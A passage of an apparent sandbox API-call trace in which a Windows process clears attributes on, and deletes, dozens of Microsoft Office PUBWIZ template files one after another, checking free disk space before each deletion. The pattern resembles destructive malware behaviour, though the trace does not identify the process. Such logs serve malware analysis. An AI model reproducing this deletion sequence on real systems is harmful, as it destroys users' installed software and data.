lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.261] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BANNER.XML", dwFileAttributes=0x80) returned 1 [0081.261] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BANNER.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\banner.xml")) returned 1 [0081.264] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.270] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BIZCARD.XML", dwFileAttributes=0x80) returned 1 [0081.271] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BIZCARD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\bizcard.xml")) returned 1 [0081.274] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.282] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BIZFORM.XML", dwFileAttributes=0x80) returned 1 [0081.282] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BIZFORM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\bizform.xml")) returned 1 [0081.286] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.291] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BROCHURE.XML", dwFileAttributes=0x80) returned 1 [0081.292] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BROCHURE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\brochure.xml")) returned 1 [0081.295] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.300] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CALENDAR.XML", dwFileAttributes=0x80) returned 1 [0081.300] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CALENDAR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\calendar.xml")) returned 1 [0081.304] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.308] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CATALOG.XML", dwFileAttributes=0x80) returned 1 [0081.308] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CATALOG.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\catalog.xml")) returned 1 [0081.312] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.316] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CERT.XML", dwFileAttributes=0x80) returned 1 [0081.316] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CERT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\cert.xml")) returned 1 [0081.320] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.325] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGACCBAR.XML", dwFileAttributes=0x80) returned 1 [0081.326] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGACCBAR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgaccbar.xml")) returned 1 [0081.328] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.332] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGACCBOX.XML", dwFileAttributes=0x80) returned 1 [0081.333] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGACCBOX.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgaccbox.xml")) returned 1 [0081.336] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.347] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGAD.XML", dwFileAttributes=0x80) returned 1 [0081.348] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGAD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgad.xml")) returned 1 [0081.350] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.355] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGATNGET.XML", dwFileAttributes=0x80) returned 1 [0081.355] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGATNGET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgatnget.xml")) returned 1 [0081.358] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.366] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBARBLL.XML", dwFileAttributes=0x80) returned 1 [0081.366] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBARBLL.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgbarbll.xml")) returned 1 [0081.369] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.374] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBORDER.XML", dwFileAttributes=0x80) returned 1 [0081.374] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBORDER.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgborder.xml")) returned 1 [0081.377] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.380] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBOXES.XML", dwFileAttributes=0x80) returned 1 [0081.380] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBOXES.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgboxes.xml")) returned 1 [0081.383] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.387] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCAL.XML", dwFileAttributes=0x80) returned 1 [0081.387] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCAL.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgcal.xml")) returned 1 [0081.391] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.394] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCHKBRD.XML", dwFileAttributes=0x80) returned 1 [0081.395] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCHKBRD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgchkbrd.xml")) returned 1 [0081.398] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.401] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCINFO.XML", dwFileAttributes=0x80) returned 1 [0081.402] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCINFO.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgcinfo.xml")) returned 1 [0081.405] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.408] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCOUPON.XML", dwFileAttributes=0x80) returned 1 [0081.408] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCOUPON.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgcoupon.xml")) returned 1 [0081.412] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.415] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGDOTS.XML", dwFileAttributes=0x80) returned 1 [0081.415] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGDOTS.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgdots.xml")) returned 1 [0081.418] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.423] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGHEADING.XML", dwFileAttributes=0x80) returned 1 [0081.423] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGHEADING.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgheading.xml")) returned 1 [0081.425] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.429] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGLINACC.XML", dwFileAttributes=0x80) returned 1 [0081.430] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGLINACC.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dglinacc.xml")) returned 1 [0081.434] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.438] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGLOGO.XML", dwFileAttributes=0x80) returned 1 [0081.438] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGLOGO.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dglogo.xml")) returned 1 [0081.441] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.445] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGMAIN.XML", dwFileAttributes=0x80) returned 1 [0081.445] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGMAIN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgmain.xml")) returned 1 [0081.448] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.452] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGMARQ.XML", dwFileAttributes=0x80) returned 1 [0081.452] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGMARQ.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgmarq.xml")) returned 1 [0081.456] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.460] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGNAVBAR.XML", dwFileAttributes=0x80) returned 1 [0081.460] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGNAVBAR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgnavbar.xml")) returned 1 [0081.463] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.467] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPICCAP.XML", dwFileAttributes=0x80) returned 1 [0081.468] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPICCAP.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgpiccap.xml")) returned 1 [0081.473] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.477] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPQUOT.XML", dwFileAttributes=0x80) returned 1 [0081.478] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPQUOT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgpquot.xml")) returned 1 [0081.481] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.487] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPUNCT.XML", dwFileAttributes=0x80) returned 1 [0081.488] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPUNCT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgpunct.xml")) returned 1 [0081.490] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.494] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGREPFRM.XML", dwFileAttributes=0x80) returned 1 [0081.494] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGREPFRM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgrepfrm.xml")) returned 1 [0081.497] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.501] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSIDEBR.XML", dwFileAttributes=0x80) returned 1 [0081.501] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSIDEBR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgsidebr.xml")) returned 1 [0081.504] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.508] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSIDEBRV.XML", dwFileAttributes=0x80) returned 1 [0081.508] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSIDEBRV.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgsidebrv.xml")) returned 1 [0081.512] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.516] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSTORY.XML", dwFileAttributes=0x80) returned 1 [0081.516] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSTORY.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgstory.xml")) returned 1 [0081.519] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.522] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSTORYVERT.XML", dwFileAttributes=0x80) returned 1 [0081.523] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSTORYVERT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgstoryvert.xml")) returned 1 [0081.526] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.530] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGTOC.XML", dwFileAttributes=0x80) returned 1 [0081.530] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGTOC.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgtoc.xml")) returned 1 [0081.533] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.537] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBAD.XML", dwFileAttributes=0x80) returned 1 [0081.538] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBAD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebad.xml")) returned 1 [0081.540] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.544] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBBTN.XML", dwFileAttributes=0x80) returned 1 [0081.544] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBBTN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebbtn.xml")) returned 1 [0081.548] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.552] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBCAL.XML", dwFileAttributes=0x80) returned 1 [0081.552] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBCAL.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebcal.xml")) returned 1 [0081.555] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.559] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBHD.XML", dwFileAttributes=0x80) returned 1 [0081.559] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBHD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebhd.xml")) returned 1 [0081.562] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.566] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBPQT.XML", dwFileAttributes=0x80) returned 1 [0081.566] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBPQT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebpqt.xml")) returned 1 [0081.569] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, 